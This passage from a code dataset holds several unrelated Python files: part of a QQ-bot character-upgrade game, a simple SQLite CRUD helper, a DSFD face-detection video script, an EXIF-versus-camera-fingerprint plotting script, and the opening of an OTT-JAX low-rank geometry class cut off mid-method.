get_fashion_info(up_info)\n nvmes = fashion_info['icon']\n bd_msg = f\"修炼结束,{sj_msg}\\n您的女友{c.name}获得了{xlmin}点修炼度{ex_msg}\\n{nvmes}\"\n await bot.send(ev, bd_msg, at_sender=True)\n\n\n@sv.on_prefix(['升级rank', 'rank升级', '提升rank'])\nasync def up_rank(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n gid = ev.group_id\n uid = ev.user_id\n duel = DuelCounter()\n if duel_judger.get_on_off_status(ev.group_id):\n msg = '现在正在决斗中哦,请决斗后再进行提升rank吧。'\n await bot.send(ev, msg, at_sender=True)\n return\n CE = CECounter()\n if len(args) != 1:\n await bot.finish(ev, '请输入 rank升级+女友名 中间用空格隔开。', at_sender=True)\n name = args[0]\n cid = chara.name2id(name)\n if cid == 1000:\n await bot.finish(ev, '请输入正确的女友名。', at_sender=True)\n cidlist = duel._get_cards(gid, uid)\n if cid not in cidlist:\n await bot.finish(ev, '该女友不在你的身边哦。', at_sender=True)\n rank = CE._get_rank(gid, uid, cid)\n if rank == MAX_RANK:\n await bot.finish(ev, '该女友rank已升至满级,无法继续升级啦。', at_sender=True)\n new_rank = rank + 
1\n rank_score = RANK_LIST[int(new_rank)]\n if get_weather(gid) == WeatherModel.YUNTIAN:\n rank_score = int(0.8 * rank_score)\n score_counter = ScoreCounter2()\n myscore = score_counter._get_score(gid, uid)\n if myscore < rank_score:\n await bot.finish(ev, f'升级rank所需金币不足!\\n由{rank}级升至{new_rank}级需要:{rank_score}个,您当前剩余:{myscore}个', at_sender=True)\n # 消耗rank证明\n if new_rank < 8:\n item = get_item_by_name(\"初级进阶许可\")\n elif 8 <= new_rank <= 13:\n item = get_item_by_name(\"中级进阶许可\")\n else:\n item = get_item_by_name(\"高级进阶许可\")\n if not check_have_item(gid, uid, item):\n await bot.finish(ev, f'你没有持有{item[\"name\"]},无法提升rank!', at_sender=True)\n use_item(gid, uid, item)\n score_counter._reduce_score(gid, uid, rank_score)\n c = chara.fromid(cid)\n CE._up_rank(gid, uid, cid)\n msg = f'\\n您花费了{rank_score}金币和对应级别证明为{c.name}提升了rank,当前rank等级为:{new_rank}级,女友战斗力大大提升!'\n await bot.send(ev, msg, at_sender=True)\n\n\n@sv.on_prefix(['角色升星', '星级提升'])\nasync def cardstar_up(bot, ev: CQEvent):\n args = ev.message.extract_plain_text().split()\n gid = ev.group_id\n uid = ev.user_id\n CE = CECounter()\n duel = DuelCounter()\n if len(args) != 1:\n await bot.finish(ev, '请输入 角色升星+女友名 中间用空格隔开。', at_sender=True)\n name = args[0]\n cid = chara.name2id(name)\n if cid == 1000:\n await bot.finish(ev, '请输入正确的女友名。', at_sender=True)\n cidlist = duel._get_cards(gid, uid)\n if cid not in cidlist:\n await bot.finish(ev, '该女友不在你的身边哦。', at_sender=True)\n star = CE._get_cardstar(gid, uid, cid)\n if star == MAX_STAR:\n await bot.finish(ev, '该女友已升至满星,无法继续升星啦。', at_sender=True)\n new_star = star + 1\n needfragment = STAR_LIST[int(new_star)]\n\n card_fragment = CE._get_fragment_num(gid, uid, cid)\n mynum = int(card_fragment)\n nvmes = get_nv_icon_with_fashion(gid, uid, cid)\n if mynum < needfragment:\n await bot.finish(ev, f'升级到{new_star}星需要{needfragment}修炼度,您的修炼度为{mynum},修炼度不够。', at_sender=True)\n CE._add_cardstar(gid, uid, cid)\n await bot.send(ev, f'升星成功!\\n成功将您的女友{name}升到了{new_star}星,女友战斗力大大提升!{nvmes}', at_sender=True)\n","sub_path":"hoshino/modules/pcr_duel/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"334313481","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAltas, Bajas y Modificaciones\n\"\"\"\ndef conectar():\n global conn\n global ejecutor\n import sqlite3\n conn = sqlite3.connect('./registroHorario.db')\n ejecutor = conn.cursor()\n\ndef seleccion(query):\n try:\n consulta = ejecutor.execute(query)\n except NameError as variable_vacia:\n print(\"Usted debe conectar a la base de datos. Por favor use para ello la función conectar() antes de llamar a esta seleccion()\")\n except Exception as e:\n print(\"Error en el select\")\n return list(consulta)\n\n\ndef operacionDirecta(query):\n try:\n ejecutor.execute(query)\n except Exception as e:\n print(e)\n\n\ndef operacionSimple(tipo,tabla,campos,valores,clausulaWhere=None):\n \"\"\"\n operaciones simples de base de datos\n\n :param tipo: A (alta) B (Baja) M (Modificacion)\n :param tabla: string. tabla en la que operamos\n :param clausulaWhere: string. 
Condicion que sigue al ´WHERE\n :return:\n \"\"\"\n query = \"\"\n if tipo == \"A\":\n query = \"INSERT INTO %s (%s) VALUES (%s)\"%(tabla,campos,valores)\n if tipo == \"B\":\n query = \"DELETE FROM %s\"%tabla\n if tipo == \"M\":\n query = \"UPDATE %s SET %s = %s\" % (tabla, campos, valores)\n if clausulaWhere != None:\n query += \" WHERE %s\"%clausulaWhere\n\n\n try:\n consulta = ejecutor.execute(query)\n conn.commit()\n #print(\"Operacion realizada con exito! confimado impacto en Base de datos\")\n except Exception as e:\n print(\"Error al intentar operar.\")\n print(\"su consulta es:\\n\\t%s\"%query)\n print(e)\n\ndef enlistar(lista):\n \"\"\"\n Toma valores de las consultas y los transforma en listas.\n El unico caso en el que esto tiene sentido es si la consulta devuelve un único valor\n :param lista: lista de elementos extraídos de la BD\n :return: lista de un solo nivel\n \"\"\"\n respuesta = [x[0] for x in lista]\n return respuesta\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157939946","text":"import os\nimport math\nimport pickle\nfrom tqdm import tqdm\nimport numpy as np\nimport cv2\nimport torch\nimport torch.nn as nn\n# from face_ssd import build_ssd\nfrom face_detection_dsfd.face_ssd_infer import SSD\nfrom face_detection_dsfd.data import widerface_640, TestBaseTransform\nfrom face_detection_dsfd.layers.functions.detection import Detect\n\n\ndef set_device(gpus=None, use_cuda=True):\n use_cuda = torch.cuda.is_available() if use_cuda else use_cuda\n if use_cuda:\n gpus = list(range(torch.cuda.device_count())) if not gpus else gpus\n print('=> using GPU devices: {}'.format(', '.join(map(str, gpus))))\n else:\n gpus = None\n print('=> using CPU device')\n device = torch.device('cuda:{}'.format(gpus[0])) if gpus else torch.device('cpu')\n\n return device, gpus\n\n\ndef main(input_path, output_path, detection_model_path='weights/WIDERFace_DSFD_RES152.pth', batch_size=8,\n display=False, out_postfix='_dsfd.pkl', gpus=None):\n cuda = True\n torch.set_grad_enabled(False)\n device, gpus = set_device(gpus)\n if cuda and torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n else:\n torch.set_default_tensor_type('torch.FloatTensor')\n\n if output_path is None:\n output_filename = os.path.splitext(os.path.basename(input_path))[0] + out_postfix\n output_dir = os.path.split(input_path)[0]\n output_path = os.path.join(output_dir, output_filename)\n elif os.path.isdir(output_path):\n output_filename = os.path.splitext(os.path.basename(input_path))[0] + out_postfix\n output_path = os.path.join(output_path, output_filename)\n\n # Initialize detection model\n net = SSD(\"test\")\n net.load_state_dict(torch.load(detection_model_path))\n net.eval()\n\n # Support multiple GPUs\n if gpus and len(gpus) > 1:\n net = nn.DataParallel(net, gpus)\n\n # Initialize detection model\n # cfg = widerface_640\n # thresh = cfg['conf_thresh']\n # net = build_ssd('test', cfg['min_dim'], cfg['num_classes']) # initialize SSD\n # net.load_state_dict(torch.load(detection_model_path))\n # net = net.cuda()\n # net.eval()\n\n # cfg = widerface_640\n # thresh = cfg['conf_thresh']\n # net = torch.jit.load(detection_model_path, map_location=device)\n # net.eval()\n print('Finished loading detection model!')\n\n transform = TestBaseTransform((104, 117, 123))\n # detect = Detect(cfg['num_classes'], 0, 
cfg['num_thresh'], cfg['conf_thresh'], cfg['nms_thresh'])\n\n # Open target video file\n cap = cv2.VideoCapture(input_path)\n if not cap.isOpened():\n raise RuntimeError('Failed to read video: ' + input_path)\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n fps = cap.get(cv2.CAP_PROP_FPS)\n target_vid_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n target_vid_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n # Calculate priors\n # image_size = (target_vid_height, target_vid_width)\n # featuremap_size = [(math.ceil(image_size[0] / (2 ** (2 + i))), math.ceil(image_size[1] / (2 ** (2 + i))))\n # for i in range(6)]\n # priors = get_prior_boxes(cfg, featuremap_size, image_size).to(device)\n\n cfg = widerface_640\n thresh = cfg['conf_thresh']\n image_size = (target_vid_height, target_vid_width)\n\n # # Initialize output video file\n # if output_path is not None:\n # if os.path.isdir(output_path):\n # output_filename = os.path.splitext(os.path.basename(input_path))[0] + '.mp4'\n # output_path = os.path.join(output_path, output_filename)\n # fourcc = cv2.VideoWriter_fourcc(*'x264')\n # out_vid = cv2.VideoWriter(output_path, fourcc, fps, (target_vid_width, target_vid_height))\n # else:\n # out_vid = None\n\n #\n max_im_shrink = ((2000.0 * 2000.0) / (target_vid_height * target_vid_width)) ** 0.5\n shrink = max_im_shrink if max_im_shrink < 1 else 1\n\n # For each frame in the video\n frame_bgr_list = []\n frame_tensor_list = []\n det_list = []\n for i in tqdm(range(total_frames)):\n ret, frame = cap.read()\n if frame is None:\n continue\n\n # Gather batches\n frame_bgr_list.append(frame)\n frame_tensor = torch.from_numpy(transform(frame)[0]).permute(2, 0, 1).unsqueeze(0).to(device)\n frame_tensor_list.append(frame_tensor)\n if len(frame_tensor_list) < batch_size and (i + 1) < total_frames:\n continue\n frame_tensor_batch = torch.cat(frame_tensor_list, dim=0)\n\n # Process\n detections_batch = net(frame_tensor_batch)\n # detections_batch = detect(pred[:, :, :4], pred[:, :, 4:], priors)\n for b, detections in enumerate(detections_batch):\n detections = detections.unsqueeze(0)\n\n det = []\n shrink = 1.0\n scale = torch.Tensor([image_size[1] / shrink, image_size[0] / shrink,\n image_size[1] / shrink, image_size[0] / shrink])\n for i in range(detections.size(1)):\n j = 0\n while detections[0, i, j, 0] >= thresh:\n curr_det = detections[0, i, j, [1, 2, 3, 4, 0]].cpu().numpy()\n curr_det[:4] *= scale.cpu().numpy()\n det.append(curr_det)\n j += 1\n\n if len(det) == 0:\n det_list.append(np.array([], dtype='float32'))\n else:\n det = np.row_stack((det))\n # if det.shape[0] > 1:\n # det = bbox_vote(det.astype(float))\n det_filtered = det[det[:, 4] > 0.5, :4]\n det_list.append(det_filtered)\n\n # Render\n if display:\n det_display = np.round(det_filtered).astype(int)\n render_img = frame_bgr_list[b]\n for rect in det_display:\n # cv2.rectangle(render_img, tuple(rect[:2]), tuple(rect[:2] + rect[2:]), (0, 0, 255), 1)\n cv2.rectangle(render_img, tuple(rect[:2]), tuple(rect[2:]), (0, 0, 255), 1)\n # if out_vid is not None:\n # out_vid.write(render_img)\n cv2.imshow('render_img', render_img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # Clear lists\n frame_bgr_list.clear()\n frame_tensor_list.clear()\n\n # Write to file\n with open(output_path, 'wb') as f:\n pickle.dump(det_list, f)\n\n\ndef get_prior_boxes(cfg, feature_maps, image_size):\n\n # number of priors for feature map location (either 4 or 6)\n variance = cfg['variance'] or [0.1]\n min_sizes = cfg['min_sizes']\n max_sizes = 
cfg['max_sizes']\n steps = cfg['steps']\n aspect_ratios = cfg['aspect_ratios']\n clip = cfg['clip']\n for v in variance:\n if v <= 0:\n raise ValueError('Variances must be greater than 0')\n\n mean = []\n\n if len(min_sizes) == 5:\n feature_maps = feature_maps[1:]\n steps = steps[1:]\n if len(min_sizes) == 4:\n feature_maps = feature_maps[2:]\n steps = steps[2:]\n\n for k, f in enumerate(feature_maps):\n # for i, j in product(range(f), repeat=2):\n for i in range(f[0]):\n for j in range(f[1]):\n # f_k = image_size / steps[k]\n f_k_i = image_size[0] / steps[k]\n f_k_j = image_size[1] / steps[k]\n # unit center x,y\n cx = (j + 0.5) / f_k_j\n cy = (i + 0.5) / f_k_i\n # aspect_ratio: 1\n # rel size: min_size\n s_k_i = min_sizes[k] / image_size[1]\n s_k_j = min_sizes[k] / image_size[0]\n # swordli@tencent\n if len(aspect_ratios[0]) == 0:\n mean += [cx, cy, s_k_i, s_k_j]\n\n # aspect_ratio: 1\n # rel size: sqrt(s_k * s_(k+1))\n # s_k_prime = sqrt(s_k * (max_sizes[k]/image_size))\n if len(max_sizes) == len(min_sizes):\n s_k_prime_i = math.sqrt(s_k_i * (max_sizes[k] / image_size[1]))\n s_k_prime_j = math.sqrt(s_k_j * (max_sizes[k] / image_size[0]))\n mean += [cx, cy, s_k_prime_i, s_k_prime_j]\n # rest of aspect ratios\n for ar in aspect_ratios[k]:\n if len(max_sizes) == len(min_sizes):\n mean += [cx, cy, s_k_prime_i / math.sqrt(ar), s_k_prime_j * math.sqrt(ar)]\n mean += [cx, cy, s_k_i / math.sqrt(ar), s_k_j * math.sqrt(ar)]\n\n # back to torch land\n output = torch.Tensor(mean).view(-1, 4)\n if clip:\n output.clamp_(max=1, min=0)\n return output\n\n\ndef bbox_vote(det):\n order = det[:, 4].ravel().argsort()[::-1]\n det = det[order, :]\n while det.shape[0] > 0:\n # IOU\n area = (det[:, 2] - det[:, 0] + 1) * (det[:, 3] - det[:, 1] + 1)\n xx1 = np.maximum(det[0, 0], det[:, 0])\n yy1 = np.maximum(det[0, 1], det[:, 1])\n xx2 = np.minimum(det[0, 2], det[:, 2])\n yy2 = np.minimum(det[0, 3], det[:, 3])\n w = np.maximum(0.0, xx2 - xx1 + 1)\n h = np.maximum(0.0, yy2 - yy1 + 1)\n inter = w * h\n o = inter / (area[0] + area[:] - inter)\n # get needed merge det and delete these det\n merge_index = np.where(o >= 0.3)[0]\n det_accu = det[merge_index, :]\n det = np.delete(det, merge_index, 0)\n if merge_index.shape[0] <= 1:\n continue\n det_accu[:, 0:4] = det_accu[:, 0:4] * np.tile(det_accu[:, -1:], (1, 4))\n max_score = np.max(det_accu[:, 4])\n det_accu_sum = np.zeros((1, 5))\n det_accu_sum[:, 0:4] = np.sum(det_accu[:, 0:4], axis=0) / np.sum(det_accu[:, -1:])\n det_accu_sum[:, 4] = max_score\n try:\n dets = np.row_stack((dets, det_accu_sum))\n except:\n dets = det_accu_sum\n dets = dets[0:750, :]\n return dets\n\n\ndef infer(net , img , transform , thresh , cuda , shrink):\n if shrink != 1:\n img = cv2.resize(img, None, None, fx=shrink, fy=shrink, interpolation=cv2.INTER_LINEAR)\n x = torch.from_numpy(transform(img)[0]).permute(2, 0, 1)\n # x = Variable(x.unsqueeze(0) , volatile=True)\n x = x.unsqueeze(0)\n if cuda:\n x = x.cuda()\n #print (shrink , x.shape)\n y = net(x) # forward pass\n detections = y.data\n # scale each detection back up to the image\n scale = torch.Tensor([ img.shape[1]/shrink, img.shape[0]/shrink,\n img.shape[1]/shrink, img.shape[0]/shrink] )\n det = []\n for i in range(detections.size(1)):\n j = 0\n while detections[0, i, j, 0] >= thresh:\n score = detections[0, i, j, 0]\n #label_name = labelmap[i-1]\n pt = (detections[0, i, j, 1:]*scale).cpu().numpy()\n coords = (pt[0], pt[1], pt[2], pt[3])\n det.append([pt[0], pt[1], pt[2], pt[3], score])\n j += 1\n if (len(det)) == 0:\n det = [ 
[0.1,0.1,0.2,0.2,0.01] ]\n det = np.array(det)\n\n keep_index = np.where(det[:, 4] >= 0)[0]\n det = det[keep_index, :]\n return det\n\n\ndef infer_flip(net , img , transform , thresh , cuda , shrink):\n img = cv2.flip(img, 1)\n det = infer(net , img , transform , thresh , cuda , shrink)\n det_t = np.zeros(det.shape)\n det_t[:, 0] = img.shape[1] - det[:, 2]\n det_t[:, 1] = det[:, 1]\n det_t[:, 2] = img.shape[1] - det[:, 0]\n det_t[:, 3] = det[:, 3]\n det_t[:, 4] = det[:, 4]\n return det_t\n\n\nif __name__ == \"__main__\":\n # Parse program arguments\n import argparse\n parser = argparse.ArgumentParser('cache_video')\n parser.add_argument('input', metavar='VIDEO',\n help='path to input video')\n parser.add_argument('-o', '--output', default=None, metavar='PATH',\n help='output directory')\n parser.add_argument('-dm', '--detection_model', metavar='PATH', default='weights/WIDERFace_DSFD_RES152.pth',\n help='path to face detection model')\n parser.add_argument('-b', '--batch-size', default=8, type=int, metavar='N',\n help='batch size (default: 8)')\n parser.add_argument('-d', '--display', action='store_true',\n help='display the rendering')\n parser.add_argument('-op', '--out_postfix', default='_dsfd.pkl', metavar='POSTFIX',\n help='output file postfix')\n parser.add_argument('--gpus', nargs='+', type=int, metavar='N',\n help='list of gpu ids to use (default: all)')\n args = parser.parse_args()\n main(args.input, args.output, args.detection_model, args.batch_size, args.display, args.out_postfix, args.gpus)\n","sub_path":"face_detection_dsfd/cache_video.py","file_name":"cache_video.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"449533459","text":"#!/usr/bin/env python\n\nimport numpy\nfrom matplotlib import pyplot\nimport subprocess\n\ndirectory = '../../kodak_db'\ndata_dir = '../data/set_2/'\n\ndef get_exif(filename):\n from fractions import Fraction\n out, err = subprocess.Popen(['identify', '-format', '%[exif:FNumber],%[exif:ExposureTime],%[exif:ISOSpeedRatings]', filename], stdout=subprocess.PIPE).communicate()\n print(out)\n return [1.0 * Fraction(x) for x in out.strip().split(',')]\n\n\ndef read_image_exif_data(filelist):\n imagelist = []\n for image in filelist:\n item = get_exif(directory + \"/\" + image) + [image, ]\n imagelist.append(item)\n return imagelist\n\ndef read_exif_from_cache(numfiles):\n exif_data = numpy.fromfile(data_dir + \"exif_cache.dat\", dtype=numpy.float)\n return exif_data.reshape(numfiles, 4) # or 3?\n\ndef create_exif_data_cache():\n exif_data = []\n for i in range(numfiles):\n data = get_exif(filelist[i])\n exif_data.append(data)\n exif_data = numpy.array(exif_data, dtype=numpy.float)\n exif_data.tofile(data_dir + \"exif_cache.dat\")\n return exif_data\n\ndef get_filelist_from_files(directory):\n out, err = subprocess.Popen(['ls', directory], stdout=subprocess.PIPE).communicate()\n filelist = out.split()\n numpy.savetxt(data_dir + \"filelist.txt\", filelist, fmt=\"%s\")\n return filelist\n\ndef get_filelist_from_cache():\n filelist = numpy.loadtxt(data_dir + \"filelist.txt\", dtype=numpy.string_)\n return filelist\n\n\ndef distmat_fig(matrix_pce, matrix_ncc, matrix_ans):\n f, (ax1, ax2, ax3) = pyplot.subplots(nrows=1, ncols=3, sharex=True, sharey=True)\n ax1.set_adjustable('box-forced')\n ax2.set_adjustable('box-forced')\n ax3.set_adjustable('box-forced')\n\n ax1.imshow(matrix_pce, cmap=pyplot.cm.jet, vmax=100)\n ax1.set_title(\"PCE scores\")\n 
ax2.imshow(matrix_ncc, cmap=pyplot.cm.jet, vmin=-0.002, vmax=0.005)\n ax2.set_title(\"NCC scores\")\n ax3.imshow(matrix_ans, cmap=pyplot.cm.jet)\n ax3.set_title(\"ground truth\")\n f.tight_layout()\n f.savefig(\"compare_ncc_pce.png\", dpi=300)\n\n\ndef pce_analysis_fig(matrix_pce, matrix_fnum, matrix_exp, matrix_iso, matrix_fcl):\n f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = pyplot.subplots(nrows=2, ncols=3, sharex=True, sharey=True)\n ax1.set_adjustable('box-forced')\n ax2.set_adjustable('box-forced')\n ax3.set_adjustable('box-forced')\n ax4.set_adjustable('box-forced')\n ax5.set_adjustable('box-forced')\n ax6.set_adjustable('box-forced')\n\n ax1.imshow(matrix_pce, cmap=pyplot.cm.jet, vmax=100)\n ax1.set_title(\"PCE scores\")\n ax2.imshow(matrix_fnum, cmap=pyplot.cm.jet)\n ax2.set_title(\"f number\")\n ax3.imshow(matrix_exp, cmap=pyplot.cm.jet)\n ax3.set_title(\"exposure times\")\n ax4.imshow(matrix_iso, cmap=pyplot.cm.jet)\n ax4.set_title(\"ISO values\")\n ax5.imshow(matrix_fcl, cmap=pyplot.cm.jet)\n ax5.set_title(\"Focal Length\")\n f.set_size_inches(8, 4, forward=True)\n f.tight_layout()\n f.savefig(\"compare_pce.png\", dpi=300)\n\n pyplot.show()\n input()\n\n\n\n\n\nif __name__ == \"__main__\":\n\n #filelist = get_filelist_from_files(directory)\n filelist = get_filelist_from_cache()\n numfiles = len(filelist)\n\n #exif_data = create_exif_data_cache()\n #exif_data = read_exif_from_cache(numfiles)\n exif_data = read_image_exif_data(filelist)\n\n\n #matrix_file = 'cluster-analysis/data/set_2/matrix_304_pce.txt'\n #matrix_pce = numpy.loadtxt(matrix_file, delimiter=',', usecols=range(304))\n matrix_file = data_dir + 'matrix_304_pce.dat'\n matrix_pce = numpy.fromfile(matrix_file, dtype='>d')\n matrix_pce = matrix_pce.reshape(numfiles, numfiles)\n\n matrix_file = data_dir + 'matrix_304_ncc.txt'\n matrix_ncc = numpy.loadtxt(matrix_file, delimiter=',', usecols=list(range(304)))\n # matrix_file = data_dir + 'matrix_304_ncc.dat'\n # matrix_ncc = numpy.fromfile(matrix_file, dtype='>d')\n matrix_ncc = matrix_ncc.reshape(numfiles, numfiles)\n\n\n\n #generate additional matrices based on exif data and ground truth\n matrix_fnum = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n matrix_exp = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n matrix_iso = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n matrix_ans = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n matrix_fcl = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n\n for i in range(matrix_pce.shape[0]):\n for j in range(matrix_pce.shape[1]):\n# matrix_fnum[i][j] = numpy.sqrt(exif_data[i][0] * exif_data[j][0])\n# matrix_exp[i][j] = numpy.sqrt(exif_data[i][1] * exif_data[j][1])\n# matrix_iso[i][j] = numpy.sqrt(exif_data[i][2] * exif_data[j][2])\n# matrix_fcl[i][j] = numpy.sqrt(exif_data[i][3] * exif_data[j][3])\n matrix_fnum[i][j] = exif_data[i][0] * exif_data[j][0]\n matrix_exp[i][j] = exif_data[i][1] * exif_data[j][1]\n matrix_iso[i][j] = exif_data[i][2] * exif_data[j][2]\n# matrix_fcl[i][j] = exif_data[i][3] * exif_data[j][3]\n cam1 = \"_\".join(filelist[i].split(\"_\")[:-1])\n cam2 = \"_\".join(filelist[j].split(\"_\")[:-1])\n if cam1 == cam2:\n matrix_ans[i][j] = 100.0\n else:\n matrix_ans[i][j] = 1.0\n if i == j:\n matrix_ans[i][j] = 0.0\n matrix_fnum[i][i] = 0.0\n matrix_exp[i][i] = 0.0\n matrix_iso[i][i] = 0.0\n matrix_fcl[i][i] = 0.0\n\n\n# pce_analysis_fig(matrix_pce, matrix_fnum, matrix_exp, matrix_iso, matrix_fcl)\n\n #plot everything\n f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = pyplot.subplots(nrows=2, ncols=3, sharex=True, 
sharey=True)\n ax1.set_adjustable('box-forced')\n ax2.set_adjustable('box-forced')\n ax3.set_adjustable('box-forced')\n ax4.set_adjustable('box-forced')\n ax5.set_adjustable('box-forced')\n ax6.set_adjustable('box-forced')\n\n ax1.imshow(matrix_pce, cmap=pyplot.cm.jet, vmax=100)\n ax1.set_title(\"PCE scores\")\n ax2.imshow(matrix_ncc, cmap=pyplot.cm.jet, vmin=-0.002, vmax=0.005)\n ax2.set_title(\"NCC scores\")\n ax3.imshow(matrix_ans, cmap=pyplot.cm.jet)\n ax3.set_title(\"ground truth\")\n# ax3.imshow(matrix_fcl, cmap=pyplot.cm.jet)\n# ax3.set_title(\"focal length\")\n ax4.imshow(matrix_fnum, cmap=pyplot.cm.jet)\n ax4.set_title(\"f number\")\n ax5.imshow(matrix_exp, cmap=pyplot.cm.jet)\n ax5.set_title(\"exposure times\")\n ax6.imshow(matrix_iso, cmap=pyplot.cm.jet)\n ax6.set_title(\"iso values\")\n\n f.set_size_inches(20, 10, forward=True)\n f.tight_layout()\n f.savefig(\"pce_ncc_correlation.png\", dpi=300)\n\n pyplot.show()\n input()\n\n","sub_path":"scripts/exif.py","file_name":"exif.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"584431796","text":"# Copyright OTT-JAX\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom typing import Any, Callable, Literal, Optional, Tuple, Union\n\nimport jax\nimport jax.numpy as jnp\n\nfrom ott import utils\nfrom ott.geometry import geometry\n\n__all__ = [\"LRCGeometry\"]\n\n\n@jax.tree_util.register_pytree_node_class\nclass LRCGeometry(geometry.Geometry):\n \"\"\"Geometry whose cost is defined by product of two low-rank matrices.\n\n Implements geometries that are defined as low rank products, i.e. for which\n there exists two matrices :math:`A` and :math:`B` of :math:`r` columns such\n that the cost of the geometry equals :math:`AB^T`. Apart from being faster to\n apply to a vector, these geometries are characterized by the fact that adding\n two such geometries should be carried out by concatenating factors, i.e.\n if :math:`C = AB^T` and :math:`D = EF^T` then :math:`C + D = [A,E][B,F]^T`\n\n Args:\n cost_1: jnp.ndarray[num_a, r]\n cost_2: jnp.ndarray[num_b, r]\n bias: constant added to entire cost matrix.\n scale: Value used to rescale the factors of the low-rank geometry.\n scale_cost: option to rescale the cost matrix. Implemented scalings are\n 'max_bound', 'mean' and 'max_cost'. Alternatively, a float\n factor can be given to rescale the cost such that\n ``cost_matrix /= scale_cost``. If `True`, use 'mean'.\n batch_size: optional size of the batch to compute online (without\n instantiating the matrix) the scale factor ``scale_cost`` of the\n :attr:`cost_matrix` when ``scale_cost = 'max_cost'``. 
If `None`, the batch\n size is set to `1024` or to the largest number of samples between\n :attr:`cost_1` and :attr:`cost_2` if smaller than `1024`.\n kwargs: keyword arguments for :class:`~ott.geometry.geometry.Geometry`.\n \"\"\"\n\n def __init__(\n self,\n cost_1: jnp.ndarray,\n cost_2: jnp.ndarray,\n bias: float = 0.0,\n scale_factor: float = 1.0,\n scale_cost: Union[bool, int, float, Literal[\"mean\", \"max_bound\",\n \"max_cost\"]] = 1.0,\n batch_size: Optional[int] = None,\n **kwargs: Any,\n ):\n super().__init__(**kwargs)\n self._cost_1 = cost_1\n self._cost_2 = cost_2\n self._bias = bias\n self._scale_factor = scale_factor\n self._scale_cost = \"mean\" if scale_cost is True else scale_cost\n self.batch_size = batch_size\n\n @property\n def cost_1(self) -> jnp.ndarray:\n \"\"\"First factor of the :attr:`cost_matrix`.\"\"\"\n scale_factor = jnp.sqrt(self._scale_factor * self.inv_scale_cost)\n return scale_factor * self._cost_1\n\n @property\n def cost_2(self) -> jnp.ndarray:\n \"\"\"Second factor of the :attr:`cost_matrix`.\"\"\"\n scale_factor = jnp.sqrt(self._scale_factor * self.inv_scale_cost)\n return scale_factor * self._cost_2\n\n @property\n def bias(self) -> float:\n \"\"\"Constant offset added to the entire :attr:`cost_matrix`.\"\"\"\n return self._bias * self.inv_scale_cost\n\n @property\n def cost_rank(self) -> int: # noqa: D102\n return self._cost_1.shape[1]\n\n @property\n def cost_matrix(self) -> jnp.ndarray:\n \"\"\"Materialize the cost matrix.\"\"\"\n return jnp.matmul(self.cost_1, self.cost_2.T) + self.bias\n\n @property\n def shape(self) -> Tuple[int, int]: # noqa: D102\n return self._cost_1.shape[0], self._cost_2.shape[0]\n\n @property\n def is_symmetric(self) -> bool: # noqa: D102\n return (\n self._cost_1.shape[0] == self._cost_2.shape[0] and\n jnp.all(self._cost_1 == self._cost_2)\n )\n\n @property\n def inv_scale_cost(self) -> float: # noqa: D102\n if isinstance(self._scale_cost,\n (int, float)) or utils.is_jax_array(self._scale_cost):\n return 1.0 / self._scale_cost\n self = self._masked_geom()\n if self._scale_cost == \"max_bound\":\n x_norm = self._cost_1[:, 0].max()\n y_norm = self._cost_2[:, 1].max()\n max_bound = x_norm + y_norm + 2 * jnp.sqrt(x_norm * y_norm)\n return 1.0 / (max_bound + self._bias)\n if self._scale_cost == \"mean\":\n factor1 = jnp.dot(self._n_normed_ones, self._cost_1)\n factor2 = jnp.dot(self._cost_2.T, self._m_normed_ones)\n mean = jnp.dot(factor1, factor2) + self._bias\n return 1.0 / mean\n if self._scale_cost == \"max_cost\":\n return 1.0 / self.compute_max_cost()\n raise ValueError(f\"Scaling {self._scale_cost} not implemented.\")\n\n def apply_square_cost(self, arr: jnp.ndarray, axis: int = 0) -> jnp.ndarray:\n \"\"\"Apply elementwise-square of cost matrix to array (vector or matrix).\"\"\"\n (n, m), r = self.shape, self.cost_rank\n # When applying square of a LRCGeometry, one can either elementwise square\n # the cost matrix, or instantiate an augmented (rank^2) LRCGeometry\n # and apply it. 
